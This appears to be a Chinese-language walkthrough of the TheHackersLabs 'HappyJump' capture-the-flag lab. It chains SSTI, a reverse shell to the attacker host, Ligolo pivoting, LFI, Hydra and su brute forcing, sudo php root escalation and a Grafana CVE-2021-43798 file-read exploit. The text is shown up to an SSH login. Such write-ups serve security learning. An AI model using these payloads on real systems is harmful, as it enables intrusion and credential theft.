TheHackersLabs-HappyJump-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.191  08:00:27:8e:3c:10       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fd:65:82       VMware, Inc.

16 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.106 seconds (121.56 hosts/sec). 4 responded
❯ export ip=192.168.60.191
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.191:22
Open 192.168.60.191:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 20:01 CST
Initiating ARP Ping Scan at 20:01
Scanning 192.168.60.191 [1 port]
Completed ARP Ping Scan at 20:01, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:01
Completed Parallel DNS resolution of 1 host. at 20:01, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:01
Scanning 192.168.60.191 [2 ports]
Discovered open port 22/tcp on 192.168.60.191
Discovered open port 5000/tcp on 192.168.60.191
Completed SYN Stealth Scan at 20:01, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.191
Host is up, received arp-response (0.00058s latency).
Scanned at 2025-02-18 20:01:54 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
5000/tcp open  upnp    syn-ack ttl 64
MAC Address: 08:00:27:8E:3C:10 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

SSTI注入

开放了5000端口，浏览器访问一下

开局是个注册面板

发现存在SSTI注入

使用payload尝试反弹shell

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/4444 0>&1\'').read() }}

用户提权

kali监听一下端口

啊❓这就拿到user了，这么快的吗

不会是个假flag吧

❯ pwncat-cs -lp 4444
[20:06:11] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[20:06:19] received connection from 192.168.60.191:57276                                                                                    bind.py:84
[20:06:19] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           192.168.60.191:57276: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) peter@HappyJump:/home/peter$ ls -al
total 132
drwx------ 4 peter peter  4096 may 23  2024 .
drwxr-xr-x 4 root  root   4096 may 23  2024 ..
-rw-r--r-- 1 peter peter   397 may 23  2024 app.py
lrwxrwxrwx 1 root  root      9 may 23  2024 .bash_history -> /dev/null
-rw-r--r-- 1 peter peter   220 may 23  2024 .bash_logout
-rw-r--r-- 1 peter peter  3526 may 23  2024 .bashrc
drwxr-xr-x 3 peter peter  4096 may 23  2024 .local
-rw-r--r-- 1 peter peter    85 may 23  2024 nota.txt
-rw-r--r-- 1 peter peter 89887 may 23  2024 pivoting.png
-rw-r--r-- 1 peter peter   807 may 23  2024 .profile
-rw-r--r-- 1 peter peter    66 may 23  2024 .selected_editor
drwxr-xr-x 2 peter peter  4096 may 23  2024 templates
-r-------- 1 peter peter    36 may 23  2024 user.txt
(remote) peter@HappyJump:/home/peter$ cat user.txt
bdc7c8e1ce71e0ebff2d76d9b58c9b74  -

有个提示nota.txt

还有一张png图片，我download下来

本地打开看一下

(remote) peter@HappyJump:/home/peter$ cat nota.txt
La copia de seguridad está en el contenedor final de Docker con la IP 10.10.10.2...
备份位于具有IP 10.10.10.2的Docker最终容器中...
(remote) peter@HappyJump:/home/peter$
(local) pwncat$ download pivoting.png
pivoting.png ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 89.9/89.9 KB • ? • 0:00:00
[20:11:18] downloaded 89.89KiB in 0.12 seconds                                                                                          download.py:71
(local) pwncat$
(remote) peter@HappyJump:/home/peter$

图片内容是docker部署的详细内容

好像总共有六层网络，我勒个豆😅

看一下网卡信息

目前网络环境下只能ping到10网段的机器

(remote) peter@HappyJump:/home/peter$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:8e:3c:10 brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.191/24 brd 192.168.60.255 scope global dynamic enp0s3
       valid_lft 1157sec preferred_lft 1157sec
    inet6 fd15:4ba5:5a2b:1008:a00:27ff:fe8e:3c10/64 scope global dynamic mngtmpaddr
       valid_lft 86381sec preferred_lft 14381sec
    inet6 fe80::a00:27ff:fe8e:3c10/64 scope link
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:88:a6:0e:6c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
9: br-fcd1d7bd1ad6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:a3:ee:19:f9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.1/24 brd 10.10.10.255 scope global br-fcd1d7bd1ad6
       valid_lft forever preferred_lft forever
    inet6 fe80::42:a3ff:feee:19f9/64 scope link
       valid_lft forever preferred_lft forever
10: dm-f4526b3fe54f: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
    link/ether 7e:2b:bd:57:c0:51 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::dcb8:d8ff:fefa:74d9/64 scope link
       valid_lft forever preferred_lft forever
11: dm-35ea21273a0e: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
    link/ether d6:08:ef:77:3c:8b brd ff:ff:ff:ff:ff:ff
    inet6 fe80::f826:7aff:fe07:2efb/64 scope link
       valid_lft forever preferred_lft forever
12: dm-24ce431d49b3: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
    link/ether d2:3d:61:41:fd:f1 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::8477:f1ff:fee1:8410/64 scope link
       valid_lft forever preferred_lft forever
13: dm-ef2458e407b5: <BROADCAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
    link/ether a2:77:f8:d2:fa:ca brd ff:ff:ff:ff:ff:ff
    inet6 fe80::a077:f8ff:fed2:faca/64 scope link
       valid_lft forever preferred_lft forever
15: veth4280f9e@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-fcd1d7bd1ad6 state UP group default
    link/ether 46:ae:33:81:8b:5e brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::44ae:33ff:fe81:8b5e/64 scope link
       valid_lft forever preferred_lft forever
(remote) peter@HappyJump:/home/peter$ ping 10.10.10.2
PING 10.10.10.2 (10.10.10.2) 56(84) bytes of data.
64 bytes from 10.10.10.2: icmp_seq=1 ttl=64 time=1.52 ms
64 bytes from 10.10.10.2: icmp_seq=2 ttl=64 time=0.034 ms
^C
--- 10.10.10.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.034/0.776/1.518/0.742 ms

Ligolo建立隧道

尝试利用Ligolo建立TUN隧道穿透一下内网

具体可以参考TheHackersLabs-TheOffice-Walkthrough | Pepster’Blog

##kali中先创建虚拟网卡
❯ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name "ligolo"
INFO[0007] Creating a new "ligolo" interface...
INFO[0007] Interface created!
ligolo-ng » INFO[0029] Agent joined.                                 id=4f3367e0-dde4-4128-86d6-4da2dc266aed name=peter@HappyJump remote="192.168.60.191:34364"
-----------------------------------------
##靶机中执行连接
(remote) peter@HappyJump:/tmp$ ./agent -connect 192.168.60.100:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11601"

将session与虚拟网卡ligolo建立TUN连接

ligolo-ng » session
? Specify a session : 1 - peter@HappyJump - 192.168.60.191:34364 - 4f3367e0-dde4-4128-86d6-4da2dc266aed
[Agent : peter@HappyJump] » tunnel_start --tun ligolo
[Agent : peter@HappyJump] » INFO[0113] Starting tunnel to peter@HappyJump (4f3367e0-dde4-4128-86d6-4da2dc266aed)
## 同时另外开一tty 手动添加路由
❯ sudo ip route add 10.10.10.0/24 dev ligolo

我先利用fscan扫一下同网段下存活主机

❯ fscan -h 10.10.10.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.10.10.0-10.10.10.255
[*] 已生成IP范围: 10.10.10.0 - 10.10.10.255
[*] 已解析CIDR 10.10.10.0/24 -> IP范围 10.10.10.0-10.10.10.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 10.10.10.1      存活 (ICMP)
[+] 目标 10.10.10.2      存活 (ICMP)
[+] ICMP存活主机数量: 2
[*] 共解析 218 个有效端口
[+] 端口开放 10.10.10.1:22
[!] 打开文件失败 result.txt: open result.txt: permission denied
[+] 端口开放 10.10.10.2:22
[!] 打开文件失败 result.txt: open result.txt: permission denied
[+] 端口开放 10.10.10.2:80
[!] 打开文件失败 result.txt: open result.txt: permission denied
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 网站标题 http://10.10.10.2         状态码:200 长度:10701  标题:Apache2 Debian Default Page: It works
[!] 打开文件失败 result.txt: open result.txt: permission denied
[!] 扫描错误 10.10.10.2:22 - ssh: handshake failed: read tcp 192.168.60.100:60576->10.10.10.2:22: i/o timeout
[!] 扫描错误 10.10.10.1:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 15.173915272s
❯ rustscan -a 10.10.10.2
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.2:22
Open 10.10.10.2:80

我尝试扫一下目录

❯ gobuster dir -u http://10.10.10.2 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/index.html           (Status: 200) [Size: 10701]
/shop                 (Status: 301) [Size: 307] [--> http://10.10.10.2/shop/]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

发现有个图片，我尝试wget一下，可能含有隐写

图片方向显然错了

LFI文件读取

不过图片下方有个报错，我尝试传递参数，结果是个LFI

可以读文件

拿到两个用户 seller manchi

❯ curl "http://10.10.10.2/shop/?archivo=../../../../../etc/passwd" |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2253  100  2253    0     0   145k      0 --:--:-- --:--:-- --:--:--  146k
        <pre>root:x:0:0:root:/root:/bin/bash
seller:x:1000:1000:seller,,,:/home/seller:/bin/bash
manchi:x:1001:1001:manchi,,,:/home/manchi:/bin/bash

Hydra爆破

分别尝试爆破ssh，拿到了manchi的密码lovely

❯ hydra -l manchi -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-18 21:02:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.10.2:22/
[22][ssh] host: 10.10.10.2   login: manchi   password: lovely
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-18 21:02:33

尝试登录一下

进行信息收集，跑一遍linpeas

找一下提示给的备份文件，无果

❯ ssh [email protected]
The authenticity of host '10.10.10.2 (10.10.10.2)' can't be established.
ED25519 key fingerprint is SHA256:7l7ozEpa6qePwn/o8bYoxlwtLa2knvlaSKIk1mkRMfU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.2' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux 851709aee958 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 16:47:47 2024 from 172.17.0.1
manchi@851709aee958:~$ ls -al
total 20
drwx------ 2 manchi manchi 4096 Apr 14  2024 .
drwxr-xr-x 1 root   root   4096 Apr 14  2024 ..
-rw-r--r-- 1 manchi manchi  220 Apr 14  2024 .bash_logout
-rw-r--r-- 1 manchi manchi 3526 Apr 14  2024 .bashrc
-rw-r--r-- 1 manchi manchi  807 Apr 14  2024 .profile

SuForce爆破

这个用户下压根就没啥东西，无奈之下尝试爆破密码

结果还真是弱密码跑出来了

用户seller 密码qwerty

anchi@851709aee958:/tmp$ wget 192.168.60.100/suForce
--2025-02-18 13:20:37--  http://192.168.60.100/suForce
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2430 (2.4K) [application/octet-stream]
Saving to: 'suForce'

suForce                               100%[=======================================================================>]   2.37K  --.-KB/s    in 0s

2025-02-18 13:20:37 (394 MB/s) - 'suForce' saved [2430/2430]

manchi@851709aee958:/tmp$ chmod +x suForce
manchi@851709aee958:/tmp$ wget 192.168.60.100/techyou.txt
--2025-02-18 13:20:48--  http://192.168.60.100/techyou.txt
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 161891 (158K) [text/plain]
Saving to: 'techyou.txt'

techyou.txt                           100%[=======================================================================>] 158.10K  --.-KB/s    in 0.006s

2025-02-18 13:20:48 (26.4 MB/s) - 'techyou.txt' saved [161891/161891]
manchi@851709aee958:/tmp$ ./suForce -u seller -w techyou.txt
            _____
 ___ _   _ |  ___|__  _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| ||  _| (_) | | | (_|  __/
|___/\__,_||_|  \___/|_|  \___\___|
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | seller
📖 Wordlist | techyou.txt
🔎 Status   | 20/20000/0%/qwerty
💥 Password | qwerty
───────────────────────────────────

有sudo权限，利用php提取即可

seller@851709aee958:~$ sudo -l
Matching Defaults entries for seller on 851709aee958:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User seller may run the following commands on 851709aee958:
    (ALL) NOPASSWD: /usr/bin/php
seller@851709aee958:~$ sudo /usr/bin/php -r "system('/bin/bash');"
root@851709aee958:/home/seller# id
uid=0(root) gid=0(root) groups=0(root)

但是那备份文件搁哪呢❓

Ligolo二层

不管了，先到下一层吧

再建一层TUN隧道代理

因为上面用了一个默认的端口11601所以这次要指定端口

❯ sudo ./proxy -selfcert -laddr 0.0.0.0:11602
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11602
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name "ligolo2"
INFO[0043] Creating a new "ligolo2" interface...
INFO[0043] Interface created!
ligolo-ng » INFO[0060] Agent joined.                                 id=d5dc2b89-b8fe-4089-964a-1fdd470e8cfb name=root@851709aee958 remote="192.168.60.191:55456"
ligolo-ng » session
? Specify a session : 1 - root@851709aee958 - 192.168.60.191:55456 - d5dc2b89-b8fe-4089-964a-1fdd470e8cfb
[Agent : root@851709aee958] » tunnel_start --tun ligolo2
[Agent : root@851709aee958] » INFO[0095] Starting tunnel to root@851709aee958 (d5dc2b89-b8fe-4089-964a-1fdd470e8cfb)
----------
#靶机执行
root@851709aee958:/tmp# wget 192.168.60.100/agent
--2025-02-18 13:43:23--  http://192.168.60.100/agent
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6033408 (5.8M) [application/octet-stream]
Saving to: 'agent'

agent                                 100%[=======================================================================>]   5.75M  --.-KB/s    in 0.05s

2025-02-18 13:43:23 (126 MB/s) - 'agent' saved [6033408/6033408]

root@851709aee958:/tmp# chmod +x agent
root@851709aee958:/tmp# ./agent -connect 192.168.60.100:11602 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11602"

扫一下端口

❯ sudo fscan -h 20.20.20.3
[sudo] password for Pepster:

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 20.20.20.3:22
[+] 端口开放 20.20.20.3:21
[+] 端口开放 20.20.20.3:3000
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[+] ftp 20.20.20.3:21:anonymous
   [->]mantenimiento
[*] 网站标题 http://20.20.20.3:3000    状态码:302 长度:29     标题:无标题 重定向地址: http://20.20.20.3:3000/login
[*] 网站标题 http://20.20.20.3:3000/login 状态码:200 长度:27909  标题:Grafana
[!] 扫描错误 20.20.20.3:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 9.001886562s

这里注意下不要扫20.20.20.2主机去了，这个主机是二层主机，不是第三层的

发现有一个maintenance.html

❯ gobuster dir -u http://20.20.20.3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://20.20.20.3
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/index.html           (Status: 200) [Size: 10701]
/maintenance.html     (Status: 200) [Size: 63]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

curl一下页面，给了个提示

❯ curl http://20.20.20.3/maintenance.html
<h1>Website under maintenance, access is in /tmp/pass.txt</h1>
网站维护中，访问在/tmp/pass.txt。

其中21端口开放了，尝试一下匿名登录一下

里面有个kdbx文件

❯ ftp [email protected]
Connected to 20.20.20.3.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64180|)
150 Here comes the directory listing.
drwxrwxrwx    1 0        0            4096 Mar 29  2024 mantenimiento
226 Directory send OK.
ftp> cd mantenimiento
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||9345|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0            2021 Mar 29  2024 database.kdbx
226 Directory send OK.
ftp> get database.kdbx
local: database.kdbx remote: database.kdbx
229 Entering Extended Passive Mode (|||56600|)
150 Opening BINARY mode data connection for database.kdbx (2021 bytes).
100% |*********************************************************************************************************|  2021        0.99 MiB/s    00:00 ETA
226 Transfer complete.
2021 bytes received in 00:00 (574.89 KiB/s)
ftp> exit
221 Goodbye.

当我尝试爆破的时候，john竟然不支持此版本

❯ keepass2john database.kdbx>hash
! database.kdbx : File version '40000' is currently not supported!

换个方向，浏览器访问一下3000端口

尝试弱密码登录 admin:admin

LFI文件读取

哎，巧了这不是之前遇到过有文件读取漏洞的

Grafana 8.3.0 - Directory Traversal and Arbitrary File Read - Multiple webapps Exploit

TheHackersLabs-Incertidumbre-Walkthrough | Pepster’Blog

装一下python需要的库

得到freddy用户

❯ cd exploit-grafana-CVE-2021-43798
❯ python3 exploit.py
  _____   _____   ___ __ ___ _     _ _ ________ ___ ___
 / __\ \ / / __|_|_  )  \_  ) |___| | |__ /__  / _ ( _ )
| (__ \ V /| _|___/ / () / /| |___|_  _|_ \ / /\_, / _ \
 \___| \_/ |___| /___\__/___|_|     |_|___//_/  /_/\___/
                @pedrohavay / @acassio22

? Enter the target list:  targets.txt

========================================

[i] Target: http://20.20.20.3:3000

[!] Payload "http://20.20.20.3:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" works.

[i] Analysing files...

[i] File "/conf/defaults.ini" found in server.
[*] File saved in "./http_20_20_20_3_3000/defaults.ini".

[i] File "/etc/grafana/grafana.ini" found in server.
[*] File saved in "./http_20_20_20_3_3000/grafana.ini".

[i] File "/etc/passwd" found in server.
[*] File saved in "./http_20_20_20_3_3000/passwd".

[i] File "/var/lib/grafana/grafana.db" found in server.
[*] File saved in "./http_20_20_20_3_3000/grafana.db".

[i] File "/proc/self/cmdline" found in server.
[*] File saved in "./http_20_20_20_3_3000/cmdline".

? Do you want to try to extract the passwords from the data source?  Yes

[i] Secret Key: SW2YcwTIb9zpOOhoPsMm

[*] Bye Bye!
❯ cat passwd|grep /bin/bash
cat: passwd: No such file or directory
❯ cat http_20_20_20_3_3000/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
freddy:x:1000:1000::/home/freddy:/bin/bash

尝试利用此用户爆破ssh 无果

哎，忘记了之前有个提示

利用payload尝试读取一下/tmp/pass.txt

❯ curl http://20.20.20.3:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp/pass.txt
t9sH76gpQ82UFeZ3GXZS

利用此密码在线打开keepass文件

KeeWeb

得到凭证freddy:t9sH76gpQ82UFeZ3GXZS

尝试连接一下

发现有sudo权限

❯ ssh [email protected]
The authenticity of host '20.20.20.3 (20.20.20.3)' can't be established.
ED25519 key fingerprint is SHA256:vI77ttzFmsp8NiCsxBpeZipRCZ9MdfkeMJojz7qMiTw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '20.20.20.3' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux e1a741f99a71 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

